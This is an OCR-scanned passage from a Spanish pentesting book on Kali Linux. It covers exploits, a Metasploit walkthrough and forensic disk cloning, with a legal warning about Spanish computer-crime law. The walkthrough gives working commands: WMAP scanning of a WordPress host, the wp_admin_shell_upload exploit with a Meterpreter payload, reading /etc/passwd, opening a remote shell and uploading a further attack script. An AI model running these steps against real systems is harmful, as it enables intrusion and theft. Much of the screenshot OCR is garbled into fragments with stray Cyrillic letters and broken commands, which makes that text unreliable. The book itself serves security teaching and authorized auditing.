no es un exploit. Que sea exploit no viene determinado porque el código ejecutado 
sea bueno o malo, sino porque permita hacer cosas que no son posibles al nivel de 
privilegios al que se lanza el exploit. 


El exploit puede ser local o remoto. Un exploit local es aquel en el que hay 
que tener una cuenta válida en la máquina para poder lanzarlo con éxito. Un exploit 
remoto es aquel en el que no hace falta una cuenta válida en la máquina, y se puede 
lanzar desde otra máquina. 
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Es frecuente encadenar exploits: primero utilizamos un exploit remoto, que 
puede que nos dé solo un acceso limitado y precario a la máquina remota, para 
después utilizar un segundo exploit que nos permita escalar a root. 


Hay muchísimos exploits conocidos y documentados; y que por alguna 
razón inquietante, айп funcionan. Son frecuentes los sistemas mal disenados, mal 
mantenidos, o simplemente que no han tenido nunca la seguridad en mente. Esos 
exploits funcionan contra esos sistemas, pero no pueden ser habitualmente utilizados 
contra un sistema bien mantenido. Sin embargo, también existen 0-day exploits: 
corresponden con exploits que aün no son conocidos por la comunidad de seguridad 
informática. Debemos de tener en cuenta que desde que se encuentra un problema 
de seguridad -que no tiene porqué ser explotable, es decir, que puede que aunque 
teóricamente sea posible utilizarlo, en la práctica su uso no sea posible-. 


8.2 QUÉ ES METASPLOIT 


Metasploit es un framework para pentesting; es decir, es un entorno que 
incluye herramientas para cubrir todo el proceso de auditoría proactiva de seguridad 
del sistema. 


Metasploit tiene fama de ser complejo de usar. La razón de que genere 
esa impresión es que no tiene un bonito menu desplegable, y muchos botoncitos 
para hacer cosas. Metasploit no está pensado para que alguien que no sabe se crea 
que sepa. Metasploit tiene como objetivo que alguien que sabe, pueda utilizar la 
herramienta sin problemas y pueda hacer todas las tareas de auditoría desde el propio 
programa. De hecho, muchas de las tareas que hemos visto en este libro que se 
pueden hacer con otras utilidades también se pueden hacer con Metasploit. 


Desgraciadamente, por limitaciones de espacio no podemos entrar en detalle 
el estudio de Metasploit: solo Metasploit ya exigiría un libro el doble de largo que 
este. Pero sí veremos la potencia de Metasploit a través de un caso práctico. 


8.3 PARTES DE METASPLOIT 


Metasploit no es realmente un programa, sino una suite completa que 
incluye una base de datos de exploits y de payloads que se pueden utilizar como 
prueba de concepto, y una serie de utilidades para aplicarlos. Algunos son sencillos. 
Otros, como el payload Meterpreter, son muy potentes y complejos, y prácticamente 
requerirían un libro solo para estudiar ese payload en concreto. 
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Las utilidades más importantes de Metasploit son: 


V msfconsole: Consola de línea de comandos para ejecutar módulos y 
mandar órdenes a Metasploit. 


Y msfgui: Interfaz gráfico, con funcionalidad equivalente a la consola 
msfconsole. 


V msfd: Daemon de Metasploit, que permite lanzar las órdenes a Metasploit 
desde una máquina remota. 


Y msfcli: Utilidad para lanzar módulos. 


Y msfupdate: Actualiza la base de datos de exploits, los módulos y la 
funcionalidad de Metasploit. 


V msfbinscan: Auditoría dentro de ejecutables. Búsqueda de instrucciones 
de salto y sobre la pila. 


Y msfpayload: Auditoría dentro de ejecutables. Generación de shell- 
codes en varios lenguajes de programación. Generación de shell-codes 
empotradas en ejecutables de varios sabores de Unix y versiones de 
Windows. 


Y msfencode: Auditoría dentro de ejecutables. Ofusca el código de la 
shellcode contra antivirus y sistemas IDS. 


Y msfvenom: Implementa la funcionalidad de las utilidades ya comentadas 
msfpayload y msfencode. 


Y msfpescan: Auditoría dentro de ejecutables. Análisis de las DLL, y 
generación de direcciones de retorno para las shellcode. 


Nos vamos a centrar en el uso de Metasploit desde línea de comandos con 


msfconsole. Eso no significa que sea la única forma posible de utilizar Metasploit: se 
puede utilizar desde msfgui, y existen aplicaciones como Armitage que no veremos 
en este libro, pero que se integran con Metasploit y sirven de interfaz gráfico de 
msfconsole: 
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vi 


Armitage 


Initia 

Comp | 

Initiating NSE at 
Completed NSE at 2 j, 
Initiating Ping nat 
Scanning 256 hosts [4 ports 
Completed Ping Scan at 

Initiating SYN Stealth Scan at 
Scanning 96 hosts [1000 ports/host] 
Discove port 80/tcp on 192.1 
port 80/tcp on 19 
port 8 pon 

port ср on 

port 
port 
port 


elapsed 


0.0905 elapsed 


total host 


Discovered 
Di ered 
Discovered 


open 


open ftcp on 192 





El armitage-ArmitageMain 











Mensa 





Attack Analysis Complete.. 







You will now see an 'Atrack' menu attached 
te each host in the Targets window, 












Happy hunting 











Initiating NSE at 
Completed NSE at 
Initiating NSE at 
Completed NSE at 136, 
Initiating Ping Scan at 
Scanning 256 hosts [4 ports/host] 

Completed Ping Scan at 22136, 2,055 elapsed 
Initiating SYN Stealth Scan at 22: 

hosts [1 ports/host] 

open port /tcp on 

open port 80/tcp on 192. 

open port 80/tcp оп 19 

open port 111/tcp on 1 

open port /tcp on 19 
Discovered open port 22/tcp on 19 
Discovered open port 21/tcp on 192. 

SYN ealth Scan Timing: About 1.76 


Aceptar | 





0. 005 


0.00s elapsed 


6 total hes 


Dis 
Dis 
Discovered 
Disce d 


8:48 remaining) 
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Aplicaciones Lugares > gg armitage-ArmitageMain v 
Armitage 


Armitage View Hosts Attacks Workspaces Help 





Services X | Scan X | Services X [Hail Mary X 


К * Finding exploits (via local magic) 


“Sorting Exploi 


aunching 


F isting sess 





Listing sessions in 3 seconds 


8.4 UN CASO DE EJEMPLO - BUSQUEDA DE VULNERABILIDADES 


Vamos a comenzar viendo un ejemplo basado en buscar las vulnerabilidades 
de un sitio con Wordpress. 


Lo primero que debemos es, desde linea de comandos, inicializar la base de 
datos de Metasploit. Para ello, primero arrancamos PostgreSQL: 


service postgresql start 
Inicializamos la información de plugins y la creación de las tablas de 
Metasploit en PostgreSQL -esto hay que hacerlo solo una vez-: 
msfdb init 

Y arrancamos el daemon de Metasploit: 


msfdb start 
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La base de datos de Metasploit solo hay que inicializarla una unica vez. El 
daemon de PostgreSQL y el daemon de Metasploit deben estar arrancados cada vez 
que vayamos a usar Metasploit —o lo configuramos para que arranquen al inicializar 
el runlevel, o tendremos que levantar a mano ambos cada vez que reiniciemos la 
máquina-. La salida de esto debe ser algo como: 


:~# service postgresql start 
:~# msfdb init 
Creating database user 'msf 
Ingrese la contraseña para el nuevo rol: 
Ingrésela nuevamente: 


Creating databases 'msf' and 'msf test' 
Creating configuration file in /usr/share/metasploit-framework/config/database.yml 
Creating initial database schema 

¿$ msfdb start 





Arrancamos la consola de Metasploit con: 


msfconsole 


Debemos obtener una pantalla como: 


:~# msfconsole 


I love shells --egypt 


Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro -- learn more on http: //rapid7.com/metasploit 


[ ] 
+ -- --=[ 1648 exploits - 946 auxiliary - 293 post ] 
+ -- --=[ 486 payloads - 40 encoders - 9 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp J 


msf > | Л, 





Es relativamente frecuente entre los novatos olvidarse de tener arrancado 
el daemon de Metasploit o PostgreSQL; en cuyo caso, el arranque será algo como: 
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root@kali:~# msfconsole 


stem Security Interface 


> access security 
ss: PERMISSION DENIED. 
> access security grid 
access: PERMISSION DENIED. 
> access main security grid 
access: PERMISSION DENIED....and... 


Validate lots of vulnerabilities ta demonstrate exposure 
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 


-[ metasploit v4.11.5-2016010401 
--=[ 1517 exploits - 875 
-- --=[ 437 payloads - 37 encoders - § 
--=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


msf > | 





En lugar de “cascar” aparece esta pantalla. La mayor parte de lo que 
hiciéramos a partir de aqui no va a funcionar. 


Suponemos que lo hemos hecho bien, y hemos arrancado el daemon de 
Metasploit y PostgreSQL con las tablas creadas. El siguiente paso que daremos 
será cargar un plugin de busqueda de vulnerabilidades. Un buen ejemplo de 
plugin de busqueda de vulnerabilidades es WMAP, especializado en busqueda de 
vulnerabilidades Web, creado a partir del SQLmap. Para comenzar a utilizarlo, 
podremos hacer: 


load wmap 


Resultando en: 


[WMAP 1. ] et | ] metasploit.com 2012 
Successfully Loaded plugin: wmap 
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Hemos cargado el plugin correctamente. Ahora damos de alta aquellos sitios 
que queremos verificar. Esto lo hacemos con: 


wmap Sites -a objetivo 


Donde objetivo corresponde con el servidor objetivo del análisis. Por 
ejemplo, si queremos analizar la web de la máquina 192.168.2.20, hacemos: 


wmap sites -a http://192.168.2.20 


Obteniendo: 


S -a http://192.168.2.20 





Debemos listar los objetivos, para verificar que se ha afiadido de forma 
correcta, lo que hacemos con: 


wmap Sites -! 


Obteniendo: 


msf > wmap sites -L 
Available sites 


Proto # Pages # Forms 





Lo siguiente es, de entre los sitios que hemos dado de alta, seleccionar aquel 
sobre el que queremos realizar las pruebas. Esto lo hacemos con: 


wmap_targets -d identificador 


Donde identificador corresponde con el identificador de la maquina sobre la 
que queremos hacer el ataque. Por ejemplo, podemos hacer: 


msf > wmap_targets -d 0 


1 Loading 192.168.2.20,http://192.168.2.20:80/. 





También podemos indicar que haremos las pruebas sobre un directorio 
concreto, en lugar de sobre el raiz del servidor dado de alta; lo que hariamos con: 


wmap targets -t webconruta 


Donde webconruta corresponde con la dirección web, con el http:// y la ruta 
completa de la web que queremos analizar. 
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Por ejemplo, podemos hacer: 
wmap targets -t http://192.168.2.20/miblog 


Podemos listar los objetivos que tenemos marcados con: 


wmap targets -l 


Que daría como salida: 


nsf » wmap targe 
[*] Defined targets 


192.168.2.20 80 





Una vez que tenemos registrado dónde haremos las pruebas, podemos listar 
las pruebas que vamos a hacer con: 


wmap run -t 


Obteniendo la siguiente salida: 


Modul 


] Module а Lia z er/http 
1 Module e Lar min/http/tomcat 
Module aw min/http/tomcat utf8 t "sal 
] Module auxili an t rupal vie er enum 
] Module auxili /scanne Frontpage login 
а st header injection 


| Module а S ег, Че] 

] Module í /http/robots tx 

] Module auxilie л tt гарег 

] Module ili anne tp n scanner 
| Module 

] Module 

] Module a 

] Module 

] Module 
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ule auxiliary 
Ле auxiliar 


auxiliary 


auxiliary 
auxiliary 


jule auxiliary а 
Module explolit/multi/ 





Finalmente, podemos lanzar todas las pruebas listadas contra el objetivo 
marcado con el comando: 


wmap run -e 


Obteniendo la salida: 


р map r -6 
[*] Using ALL wmap enabled modules. 
) WMAP NODES DEFINED. Executing local modules 
target 


18 11:54:5 


Module auxiliary/scanner/http/http version 


12.168.2.20:80 lighttpd/1.4.31 
dule auxiliary/scanner/http/open proxy 
*] Module auxiliary/admi ttp/tomcat administration 
*] Module auxiliary/admin/http/tomcat utf8 traversal 
Attempting to connect to 192.168.2.20:80 
s) found d 
auxiliary/scanner/http/drupalllviews user enum 
does not appear to be vulnerable, will not continue 
y/scanner/http/frontpage lo 
htt /192.168.2.28/ may not support FrontPage Server Extensions 
Module auxiliary/scanner/http/host header injection 
Module auxiliary/scanner/http/options 
: 9 allows OPTIONS, GET, HEAD, POST methods 
auxiliary/scanner/http/robots txt 
auxiliary/scanner/http/scraper 
nuxiliary/scanner/http/svn_scanner 
ode '404' as not found. 
auxiliar canner/http/trace 
auxiliary/scanner/http/vhost scanner 
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Que continua con: 


fapache range dos 


extensio 
extensic 
with extensi 
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Aquí tenemos pantallas y pantallas de SOAPAction, hasta llegar a: 


to SOAP 

to SOAP 

to SOAPAct 

to SOAPAction: 
to SOAPAct 

to SOAPActic 


to SOAPAct 


to SOAPAct 

to SOAPActio 

to SOAPActior A nas witt >. A x at Falled. 
to SOAPAc Ц у wit d 1 Failed. 


dul e 
fodule auxi 
fodule exploit/multi/http/lcms php exec 


++++++++++++++++++++++++++++++ 





Hemos terminado. Ahora listamos las vulnerabilidades directamente 
explotables con: 


vulns 


Cuya salida sería algo como: 


"sf > vulns 


Vuln: he Ma name=WordPress Admin Shell Upload refs= 
asf > 


O podemos mirar puntos potenciales de ataque, con: 





wmap_vulns -! 


Que tendria como salida: 


: directory /phpmyadmin/ 
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Podemos utilizar tanto una información como la otra para utilizar uno de los 
exploits de Metasploit, o hacernos el nuestro. Vamos a centrarnos ahora en el primer 
caso: utilizar un exploit preexistente. 


8.5 UN CASO DE EJEMPLO - EXPLOTACIÓN DE VULNERABILIDADES 


Press Admin Shell Upload refs= 





Ahora vamos a explotarlo. Sabemos que es un exploit de Wordpress, por lo 
que primero buscaremos todos los exploits de Wordpress; lo que hacemos con: 


search name:wordpress 


Y la salida será: 


¡sf > search name:wordpress 


Matching Module: 


v importer user extract 


e hash extract 
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WordPress Subscrit 


Admin St 


s Plugin 4 


ploit Aw F set nadge ploa эуе 2012-65-26 le магар ress 
nager PHP F1 
exploit /unix/w p/ wr reativec t tt file u J 2014 9-22 Jd id-181- Wordpress 


5 Downloat 


WP Easy 


marketing file | 
Load 2014-09-2 Wordpress 1 
WordPress cat 
Wordpre 
WordPress 
WordPress 
WordP re 
WordPress 
jxcellent WordPress 
ellent Wordpre: 
lider_upload_execute I 2814-11-2 axcellent WordPress 
ability 
allery_upload 2614-08-28 excellent Wordpr 
xcellent WordPress 
wordPres 


Wordpress work 


р=һор ecommerce file upload 815-03-09 E WordPress WPshop | 


Wordpress WPTouct 


Wordpress MailPoe 





Lo siguiente que haremos será utilizar uno de estos exploits. La forma de 
utilizar el exploit será mediante el comando: 


use caminoexploit 


Donde caminoexploit es el nombre completo del exploit, con su camino, tal 
y como lo vemos en el listado anterior. 


Vamos a utilizar el exploit que aprovecha la vulnerabilidad encontrada en el 
paso anterior; lo que haremos con: 


use exploit/unix/webapp/wp admin shell upload 
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El resultado es: 





Es interesante observar como el prompt ha cambiado, y ahora estamos dentro 
del exploit. 


Podemos mostrar los targets potenciales de este exploit con: 
show targets 


Obtendríamos algo como: 


> show targets 





Podemos mostrar los payloads disponibles haciendo: 
show payloads 


Obtendríamos algo como: 


, Bind TCP Inline 


tager IPv5 
tagar IPv6 wit 


PHP Command, Double 


P Command Shell 
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Tenemos un payload especialmente interesante, el Meterpreter. Vamos 


a poner un socket TCP a la escucha con el Meterpeter, para controlar la máquina 
remota. 


Lo primero es poner las opciones del exploit. Vemos las opciones con: 


show options 


Obteniendo: 


s (exploit/unix/webapp/wp 


the w 


55 username to 
er virtual host 


I 


ASSWORD prueba 


SERNAME prueba 
Е => prueba 





Ahora modificamos los parametros. Debemos definir la IP del servidor, 
asi como el nombre y el usuario de un usuario del blog que hayamos identificado 


mediante otra técnica -inyección SQL, diccionario de claves o ingeniería social-. 
Haremos: 


set RHOST 192.168.2.20 
set PASSWORD prueba 
set USERNAME prueba 


Para definir estos parámetros. Ahora vemos que todo ha funcionado bien: 


show options 


Obteniendo la salida: 
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it(wp admin shell upload) > set RHOST 192.168.2.2@ 
.20 
admin shell upload) > set USERNAME prueba 


admin shell upload) > set WORD prueba 


а 
admin shell upload) > sh 


Module options (exploit/unix/webapp/wp_admin_shell_| 
Current Setting Required D 


prueba 


he wordpress applic 
name to authentica 





Ahora asignamos el payload que queramos, lo que hacemos con: 


set PAYLOAD rutadelpayload 


Donde rutadelpayload será el nombre y la ruta del payload, tal y como la 
vimos con el comando show payloads. En nuestro ejemplo concreto, haremos: 


set PAYLOAD php/meterpreter/bind_tcp 


Obteniendo: 


mef exploit(wp admin shell upload) > set 
PAYLOAD => php/meterpreter/bind tcp 





Y ahora viene la "magia" de Metasploit. Lanzamos el exploit con: 
exploit 


Obteniendo como resultado: 


jloit(wp admin shell upload) > exploit 


ed bind handler 
using prueba:prueba... 


+] Deleted h 


[s 
[+] Deleted xKAzJIkieQ .php 





materpreter | 
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Esto se ha puesto interesante: acabamos de *escalar" de un usuario de 
Wordpress a una sesión en una máquina remota autentificada. 


Solo un detalle más. Algunos payloads tienen sus propios parámetros. Por 
ejemplo, si hacemos: 


use php/meterpreter/bind tcp 


Vemos que entramos en el payload: 


) » use php/meterpreter/bind tcp 





Podemos ver las opciones de configuración con: 
show options 


Obteniendo: 


msf payload( > show options 
Module options (payload/php/meterpreter/bind tcp): 


Name Current Setting Required Description 


RHOST The target address 





En este caso, no ha hecho falta: las opciones por defecto nos han valido. Pero 
no tendremos problemas en cambiar las opciones de los payload si lo necesitamos. 


8.6 METERPRETER 


Meterpreter es un troyano completo, que nos permite tomar el control remoto 
de la máquina. Esto permitirá escalar privilegios dentro de la máquina, obtener 
información sensible, o utilizar la máquina en la que está instalado Meterpreter como 
"máquina de salto" para ir a por otro sistema. 


En nuestro ejemplo concreto, podemos desde el Meterpreter ver información 
de los usuarios del sistema remoto, haciendo: 


cat /etc/passwd 
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Obteniendo: 


n/irc / 
Bug-Reportinc | gnats:/bin/sh 


in/false 
dispatcher:/bin/sh 


lord:/bin/false 





O ver el contenido de directorios; por ejemplo, si hacemos: 


Is /home 


Obteniendo como resultado: 


meterpre is /home 


'/rwxr-xr-x 
hidroponia.servidor 
invitado 

3 +00 irbis 

2016-02-08 28:56:15 «0080  nohup.out 


с 

7 

9 
7 


D 


[а 





О ver los procesos en ejecución en el servidor remoto con: 


ps 
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Obteniendo: 


er > ps 





También podemos hacer un shell remoto, con el comando: 


shell 


Y a partir de aquí, podremos lanzar comandos de línea de comandos como si 
estuvieramos en la máquina remota: 
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Cualquier comando. De hecho, si se quiere hacer una escalada о un salto a 
partir de este servidor, podemos subir una explotación de una vulnerabilidad local o 
un ataque scripteado utilizando upload: 


upload ficherolocal directorioremoto 


Se subirá el fichero local ficherolocal al directorio de la máquina remota 
directorioremoto. Por ejemplo, si hacemos: 


upload siguienteataque.sh /tmp/ 


Obtendremos: 





guientestaque.s 


Hemos subido el script al directorio tmp de la máquina remota, y ahora 
podremos lanzarlo con el comando shell y continuar haciendo cosas, pero ya desde 
la máquina remota. 


Es importante que entendamos las connotaciones de lo que estamos viendo: 
en principio, en este caso concreto, podríamos hacer cualquier cosa que pudiera 
hacer el usuario efectivo del servidor web. En un sistema Unix bien configurado, eso 
ya da mucho poder; ya que hemos pasado de trabajar con vulnerabilidades remotas 
a trabajar con vulnerabilidades locales y tener un shell local. Sin embargo, a veces 
-especialmente en sistemas Windows-, Meterpreter obtiene privilegios completos 
de administración. Y aunque no los obtenga, desde Meterpreter se pueden hacer 
cosas que ponen los pelos de punta: sacar fotos desde la webcam con webcam snap, 
limpiar logs, lanzar programas, borrar discos o instalar aplicaciones son algunas de 
las cosas que se pueden hacer. Una herramienta muy potente y con la que podemos 
potencialmente hacer mucho daño; por lo que será rara la auditoría de seguridad 
en la que el test de intrusión negociado con el cliente nos haga llegar tan lejos. 
Normalmente, la captura de un fichero local es más que suficiente para convencer al 
director de informática más cerrado de mollera que tienen un problema muy grave 
con la seguridad. 





ADVERTENCIA LEGAL 


Ya de entrada, la tenencia de Kali como herramienta bordea lo legal. 
El artículo 197ter del nuevo código penal espanol dice que: 


Será castigado con una pena de prisión de seis meses a dos anos o multa de 
tres a dieciocho meses el que, sin estar debidamente autorizado, produzca, adquiera 
para su uso, importe o, de cualquier modo, facilite a terceros, con la intención de 
facilitar la comisión de alguno de los delitos a que se refieren los apartados 1 y 2 del 
artículo 197 o el artículo 197 bis: 


1. un programa informático, concebido o adaptado principalmente para 
cometer dichos delitos; o 


2. una contrasena de ordenador, un código de acceso o datos similares que 
permitan acceder a la totalidad o a una parte de un sistema de información. 


Aquí estamos en un escenario similar al de si un destornillador es una 
herramienta o un arma. Si llevas el destornillador en una caja de herramientas, en el 
maletero del coche, te para la Guardia Civil, y tienes una narrativa razonable de qué 
haces con un destornillador en una caja de herramientas, es poco probable que tengas 
problemas legales. 


Por otro lado, si te pillan con un destornillador en una discoteca llena de 
gente a la una de la madrugada y no eres de mantenimiento, casi con total seguridad 
te lo van a requisar y te llegará la propuesta de sanción. Aunque el Reglamento de 
Armas no menciona que un destornillador no es arma por la mariana en el taller y 
sí es arma de madrugada en la discoteca, la interpretación que se hace es que el que 
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el destornillador sea una herramienta o un arma de quinta categoría depende del 
contexto. 


Entre estos dos escenarios hay toda una escala de grises, cuya valoración 
depende en primer lugar del miembro de las FCSE que te pille con el destornillador, 
y en segundo lugar del tribunal que le toque juzgar el hecho. En cualquier caso, a 
nadie le gusta complicarse la vida. 


Con esta herramienta, pasa lo mismo. 


Si te pillan en un despacho en el que no deberías estar, en una empresa que 
no es la tuya, enchufando un USB con Kali a un ordenador que no te pertenece, sin 
autorización de nadie, a las FCSE les va a importar poco la película que les cuentes 
de "Hacking ético", "Whitehat", y todo lo que se te ocurra. 


Trabajando como auditor de seguridad, en el contexto de una auditoría, 
con todos los papeles y autorizaciones firmados, y limitándote a hacer lo que se te 
ha contratado contra las máquinas que se te ha contratado por el propietario legal 
de las máquinas, lo peor que te puede ocurrir es que pierdas algunas horas dando 
explicaciones a un miembro de los FCSE; que primero estará mosqueado, y después 
intrigado. 


Entre estos dos escenarios hay toda una escala de grises. El problema es que 
el destornillador termina en multa, y esto termina en cárcel. Por lo que personalmente 
te recomiendo que estés siempre en el lado más claro del espectro. Entrar en un 
organismo oficial con un portátil con Kali instalado, por poner un ejemplo, es una 
fuente absurda de problemas innecesarios. Kali no es una herramienta que necesites 
llevar todo el tiempo encima. Y piensa que, si te paran y no tienes una narrativa 
razonable, te pueden aplicar el 197ter. No me consta jurisprudencia; pero la ley dice 
lo que dice, y el caso más parecido de lo que hay en la ley hasta ahora es el de las 
herramientas que pueden también ser armas. Esto es una herramienta, pero también 
puede ser un programa concebido para cometer delitos. Así que sé sabio y prudente; 
y no te compliques la vida. 


Kali es una excepcional herramienta de análisis forense y para realizar test 
de intrusiones; peor también podría ser valorado en determinados contextos como 
que está bajo el 197ter. Utilizando Kali, dependes de lo que el tribunal evalue que la 
palabra "principalmente" significa. 


Por lo que debes tener eso en cuenta habitualmente. 


Además de eso, no solo la tenencia; sino el uso inadecuado de lo aprendido 
en este libro puede potencialmente ser delito penado con cárcel en Espana. 
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En concreto, el artículo 197 bis del nuevo código penal español dice que: 


1. El que por cualquier medio o procedimiento, vulnerando las medidas de 
seguridad establecidas para impedirlo, y sin estar debidamente autorizado, 
acceda o facilite a otro el acceso al conjunto o una parte de un sistema de 
información o se mantenga en él en contra de la voluntad de quien tenga 
el legítimo derecho a excluirlo, será castigado con pena de prisión de 
seis meses a dos años. 


2. El que mediante la utilización de artificios o instrumentos técnicos, y 
sin estar debidamente autorizado, intercepte transmisiones no públicas de 
datos informáticos que se produzcan desde, hacia o dentro de un sistema 
de información, incluidas las emisiones electromagnéticas de los mismos, 
será castigado con una pena de prisión de tres meses a dos años o multa 
de tres a doce meses. 


También es importante recordar lo que dice el artículo 197ter del código 
penal español: 


Será castigado con una pena de prisión de seis meses a dos años o multa de 
tres a dieciocho meses el que, sin estar debidamente autorizado, produzca, adquiera 
para su uso, importe o, de cualquier modo, facilite a terceros, con la intención de 
facilitar la comisión de alguno de los delitos a que se refieren los apartados 1 y 2 del 
artículo 197 o el artículo 197 bis: 


1. un programa informático, concebido o adaptado principalmente para 
cometer dichos delitos; o 


2. una contraseña de ordenador, un código de acceso o datos similares que 
permitan acceder a la totalidad o a una parte de un sistema de información. 


Aunque hablamos de software que en principio se utiliza para hacer 
auditorías de seguridad, ahora explica a un tribunal que te ha “cazado” haciendo lo 
del 197 bis, que el software que estabas utilizando no cumple las condiciones del 197 
ter. Hablamos de hasta seis años de cárcel. 


Así que cuidadito con las tonterías, que seis años de cárcel no es una broma. 
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9.1 EJEMPLOS Y CAPTURAS DE LOS DOCUMENTOS DE ESTE LIBRO 

Respecto a los ejemplos reales y las capturas reales mostradas en este 
libro, todos han sido realizados con la autorización expresa de los propietarios 
de los equipos contra los que se han realizado estas pruebas. 


No realice nunca estas operaciones sin autorización expresa de los 
propietarios de los sistemas auditados. 





ANÁLISIS FORENSE CON KALI 


Finalmente, veremos las características de Kali como herramienta forense. 


Al arrancar, Kali nos ofrece un modo forense "Live" -Live (forensic mode)-: 


“the quieter you become, the more you are able to hear" 


У P SUP STRIS Кы 
Boot menu 


hive: (emit) aaa — 
Li Isafe) 


ve Camd64 fai 


ve (forensic mode) 
ISB Persistence (check kali.org/prst) 
(check kali.org/prst 
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Con esta opción, tendremos un Kali completamente funcional, con la 
siguientes características: 


У En modo forense, Kali no monta automáticamente ningún medio de 
almacenamiento distinto que el propio disco de arranque. 


Y Esto incluye discos duros internos, y particiones swap -que, por defecto, 
todas las distribuciones montan habitualmente-. 


VF No se activa la red por defecto, debiendo activarse a mano. 


Y La clave de root de la distribución en Live es toor. 


Para el análisis forense, muchas de las cosas que necesitaremos ya las hemos 
visto en este libro, o forman parte de los conocimientos básicos de Unix —find, grep, 
tail, strings... -. Por ello, nos vamos a centrar en las dos tareas que tendremos que 
hacer con mayor frecuencia: clonado de discos y data carving. Luego comentaremos 
algunas utilidades que suelen usarse, y que son más difíciles de encuadrar. 


10.1 USO DE KALI EN ANÁLISIS FORENSE. CLONADO DE DISCOS 


El clonado de discos es una de las tareas que realizaremos con más 
frecuencia en un trabajo forense. Lo más comün es utilizar o el ordenador analizado, 
arrancándolo desde Kali en modo forense, o una estación tipo NUC que llevemos 
con nosotros. Es muy importante en un análisis forense jamás arrancar desde el disco 
duro analizado. 


Para el clonado de discos, la forma más rápida de hacerlo es con el comando 
dd, que tiene como sintaxis: 


dd conv=sync,noerror if=dispositivodisco of=ficherosalida bs=tambloque 


Donde dispositivodisco será el dispositivo de disco que queramos clonar 
—el origen, por lo tanto—, y ficherosalida será el fichero de imagen —el destino, por 
lo tanto-. tambloque es el tamano de bloque, y hace que dd lea de tambloque en 
tambloque, acelerando el proceso. tambloque debe ser 4096 en la mayor parte de los 
discos, salvo en los Western Digital, que debe ser de 512. 


La opción conv=sync,noerror es muy importante: noerror hace que dd no 
pare aunque lea bloques erróneos. Por otro lado, sync hace que en lugar de "saltarse" 
los bloques con error, lo que es un problema clonando imágenes, los rellene de ceros. 
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Una vez que hemos terminado de generar la imagen. Esto lo podemos hacer 
соп: 


md5sum nombreimagen > nombreimagen.md5 


Donde nombreimagen será el nombre de la imagen, y nombreimagen.md5 
será el nombre del fichero donde grabaremos la firma. Recomiendo que ese fichero 
se llame como la imagen, pero terminado en md5. 


La firma md5 es muy conveniente de cara a una pericia, ya que es compacta 
y puede aparecer en una pericia escrita. Pero es vulnerable al ataque por colisión 
de hash, especialmente en ficheros tan grandes como las imágenes. Tenemos como 
alternativa la firma SHAS512, que no es vulnerable al susodicho ataque. Podemos 
firmar para SHA512 con: 


sha512sum nombreimagen » nombreimagen.sha512 


Donde nombreimagen será el nombre de la imagen, y el nombre del fichero 
donde grabaremos la firma será nombreimagen.sha512. Recomiendo que ese fichero 
se llame como la imagen, pero terminado en sha512. Las firmas SHA512 son muy 
largas y poco prácticas; por lo que personalmente suelo firmar también el fichero 
SHAS512 con MDS, incluir la firma МР5 de la imagen y de la firma SHA512 en la 
pericia, у luego entregar la firma SHA512 en el CD que acompañe la pericia. Hasta 
ahora, ningún tribunal ha dudado en esta mecánica. 


Es importante destacar que la firma hash de un disco origen con sectores 
dañados no se puede hacer. Por otro lado, la firma hash de un disco de estado sólido 
se puede hacer, pero puede no coincidir con la imagen, o no coincidir dos veces que 
hagamos la firma con el mismo disco duro, aunque no esté alterado. Esto se debe 
a cómo funciona internamente un disco duro de estado sólido, y no tiene solución 
directa, clonemos como clonemos y firmemos como firmemos. 


Nos podemos encontrar, en cualquier caso, con problemas. El primero de 
ellos es que el disco que nos hemos llevado para clonar sea más pequeño que el 
disco que tenemos que clonar. La primera solución, y que suele ser suficiente, es 
comprimir la imagen; lo que hacemos con: 


dd conv=sync,noerror if=dispositivodisco bs=tambloque | gzip -c > ficherosalida.gz 


Donde dispositivodisco será el dispositivo de disco que queramos clonar -el 
origen, por lo tanto—, y ficherosalida.gz será el fichero de imagen comprimida —el 
destino, por lo tanto-; y que es recomendable que termine en .gz. Por otro lado, 
tambloque es el tamano de bloque, y hace que dd lea de tambloque en tambloque, 
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acelerando el proceso. tambloque debe ser 4096 en la mayor parte de los discos, 
salvo en los Western Digital, que debe ser de 512. 


gzip suele ser más popular, pero no obtendremos ni el volcado más rápido, 
ni el fichero más pequeño. Podemos conseguir esto con bzip2, que permite indicar 
utilizar la mayor compresión posible. Con compresión máxima, no son extranas las 
tasas de compresión 5:1 o 4:1 en imágenes de discos. Haríamos: 


dd conv=sync,noerror if=dispositivodisco bs=tambloque | bzip2 -9f > ficherosalida.bz2 


Donde dispositivodisco será el dispositivo de disco que queramos clonar -el 
origen, por lo tanto-, y ficherosalida.bz2 será el fichero de imagen comprimida —el 
destino, por lo tanto-; y que es recomendable que termine en .bz2. Por otro lado, 
tambloque es el tamano de bloque, y hace que dd lea de tambloque en tambloque, 
acelerando el proceso. tambloque debe ser 4096 en la mayor parte de los discos, 
salvo en los Western Digital, que debe ser de 512. 


Firmamos en ambos casos el comprimido, y hemos resuelto el problema. 


Otro problema que tenemos a veces es que queremos clonar un disco en un 
escenario en el que no podemos abrir la máquina para sacar el disco duro, o enchufar 
otro disco duro, por razones técnicas o legales. Entonces nos veremos forzados a 
hacer un clonado a través de la red. La forma de hacer esto es arrancando desde Kali 
en dos máquinas distintas: la máquina que tiene el disco duro que queremos clonar, 
y la máquina en la que podemos volcar la imagen. En la máquina en la que podemos 
volcar la imagen hacemos: 


nc -l -p puerto | dd conv=sync,noerror  of-ficherosalida. 
bz bs=tambloque 


Donde puerto será el puerto TCP al que se pondrá a la escucha, y el fichero 
de imagen comprimida —el destino, por lo tanto— será ficherosalida. y que es 
recomendable que termine en .bz2. Por otro lado, tambloque es el tamano de bloque, 
y hace que dd escriba de tambloque en tambloque, acelerando el proceso. tambloque 
debe ser 4096 en la mayor parte de los discos, salvo en los Western Digital, que debe 
ser de 512. 


Por otro lado, en la máquina dónde tenemos el disco que pretendemos clonar, 
hacemos: 


dd convzsync,noerror if=dispositivodisco bs=tambloque | bzip2 -9f | 
nc IPreceptor puerto 
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Donde dispositivodisco será el dispositivo de disco que queramos clonar 
-el origen, por lo tanto-, y tambloque es el tamano de bloque, y hace que dd lea 
de tambloque en tambloque, acelerando el proceso. tambloque debe ser 4096 en la 
mayor parte de los discos, salvo en los Western Digital, que debe ser de 512. Por 
